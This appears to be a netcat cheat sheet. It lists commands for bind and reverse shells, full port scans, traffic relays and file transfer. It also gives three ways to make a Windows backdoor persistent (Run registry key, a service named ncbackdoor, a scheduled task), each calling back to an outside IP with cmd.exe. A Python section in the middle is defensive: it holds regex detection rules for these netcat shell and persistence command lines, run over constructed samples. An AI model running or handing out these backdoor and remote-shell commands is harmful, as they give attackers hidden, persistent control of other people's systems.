NetCat is known as the TCP/IP Swiss-army knife. It reads and writes data across a TCP or UDP connection. It is available for most Unix/Linux operating systems as well as Windows.
Here are some fun things you can do with NetCat:
Execute shell on client connection:
nc -l -p 12345 -e /bin/bash (Unix/Linux)
nc -l -p 12345 -e cmd.exe (Windows)
nc -l -p 12345 -e cmd.exe -L (Windows only: -L reopens the listener after the client closes the connection)
Reverse shell:
nc -l -p 12345
nc <server ip> 12345 -e /bin/bash
Zero-I/O mode (port scanning) (-z):
nc -z -v 192.168.1.1 1-65535
Redirect received data to a file:
nc -l -p 12345 > dumpfile
Redirect a file to the connection. When a client connects, it receives the file:
nc -l -p 12345 < dumpfile
Client connects to the server; dumpfile is transferred from the server and written out on the client:
nc 192.168.1.1 12345 > dumpfile
Redirect ports and traffic (relay):
nc -l -p 12345 | nc <hostname of target> 54321
The client connects to the server on port 12345, but the target sees the traffic coming from the server on port 54321.
Configure backdoor to run every time a Windows user logs in (domain privileges):
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.70 1234 -e cmd.exe"
Executing backdoor using a Windows service (local SYSTEM shell only):
sc create ncbackdoor binPath= "cmd /K start c:\nc.exe -d 192.168.1.70 1234 -e cmd.exe" start= auto error= ignore
net start ncbackdoor
Executing backdoor using the Windows task scheduler (local SYSTEM shell only):
C:\>at 15:00:00 /every:m,t,w,th,f,s,su "c:\nc.exe -d 192.168.1.70 1234 -e cmd.exe"
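Every command in the three persistence sections above (Run key, service, scheduled task) leaves a process-creation record on the host, and all of them share the same tell-tale: a netcat binary invoked with -e and a shell. The following Python is an added example, not part of the original cheat sheet, showing how a defender can run simple detection rules over such command lines. The sample lines are constructed from the commands on this page plus benign noise; they are not real telemetry, and the rule names, the severity scheme and the assumption that each log record has been reduced to its CommandLine field (as Sysmon Event ID 1 or most EDR process events provide) are all this example's own choices.

```python
import re
from typing import List, Tuple

# Constructed sample process-creation command lines (not real telemetry).
# They mirror the commands on this page and add two benign lines as noise.
SAMPLE_COMMAND_LINES = [
    r'C:\Windows\System32\cmd.exe /c dir C:\Users',
    r'nc -l -p 12345 -e cmd.exe',
    r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.70 1234 -e cmd.exe"',
    r'sc create ncbackdoor binPath= "cmd /K start c:\nc.exe -d 192.168.1.70 1234 -e cmd.exe" start= auto error= ignore',
    r'at 15:00:00 /every:m,t,w,th,f,s,su "c:\nc.exe -d 192.168.1.70 1234 -e cmd.exe"',
    r'nc -z -v 192.168.1.1 1-65535',
    r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /d "C:\Program Files\OneDrive\OneDrive.exe /background"',
    r'nc -l -p 12345',
]

# A netcat binary as its own token: at line start, or after whitespace, a quote,
# or a path separator, and followed by whitespace, a quote or end of line.
NETCAT_BIN = re.compile(
    r'(?:^|[\s"\\/])(?:nc|nc64|ncat|netcat)(?:\.exe)?(?=\s|"|$)', re.IGNORECASE)

# Hypothetical rule set: each entry is (rule name, pattern tested on the command line).
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # -e (or -c) followed by a shell binary, with or without a path prefix
    ("netcat_spawns_shell",
     re.compile(r'\s-[a-z]*[ec]\s+(?:\S*[\\/])?(?:cmd(?:\.exe)?|(?:ba)?sh)\b', re.IGNORECASE)),
    # listening mode: the host is exposing a port
    ("netcat_listener", re.compile(r'\s-l\b', re.IGNORECASE)),
    # zero-I/O mode used for port sweeps
    ("netcat_port_sweep", re.compile(r'\s-z\b', re.IGNORECASE)),
    # reg add into the per-machine or per-user Run / RunOnce keys
    ("run_key_persistence",
     re.compile(r'\breg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\Run(?:Once)?\b', re.IGNORECASE)),
    # sc create registering a new service
    ("service_persistence", re.compile(r'\bsc(?:\.exe)?\s+create\b', re.IGNORECASE)),
    # legacy at <time> or schtasks /create
    ("scheduled_task_persistence",
     re.compile(r'\b(?:at(?:\.exe)?\s+\d{1,2}:\d{2}|schtasks(?:\.exe)?\s+/create)\b', re.IGNORECASE)),
]


def classify(cmdline: str) -> List[str]:
    """Return the names of every rule that fires for one command line.

    Lines that do not reference a netcat binary are ignored entirely, so a
    benign 'reg add ...\\Run' for OneDrive produces no finding.
    """
    if not NETCAT_BIN.search(cmdline):
        return []
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def severity(tags: List[str]) -> str:
    """Rank a set of fired rules: a netcat shell that is also being persisted is worst."""
    if "netcat_spawns_shell" in tags and any(t.endswith("_persistence") for t in tags):
        return "high"
    if "netcat_spawns_shell" in tags:
        return "medium"
    return "low" if tags else "none"


def scan(lines: List[str]) -> List[Tuple[str, List[str], str]]:
    """Run the rules over many command lines; return (severity, tags, line) per hit."""
    findings = []
    for line in lines:
        tags = classify(line)
        if tags:
            findings.append((severity(tags), tags, line))
    return findings


if __name__ == "__main__":
    for sev, tags, line in scan(SAMPLE_COMMAND_LINES):
        print(f"[{sev:6}] {','.join(tags):45} {line}")
```

Feeding real Sysmon or EDR exports into scan() is a matter of extracting the CommandLine field first; the value of keying every rule on the netcat token is that the persistence rules only fire when the persisted payload is itself netcat, which keeps legitimate Run-key and service installs out of the results.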
Unzip/un-tar file over network:
source:
dd if=some.file.tar.gz | nc <destination ip> 12345 -vvv
destination (tar reads the archive from stdin, given as "-"):
nc -l -p 12345 -vv | tar xzf -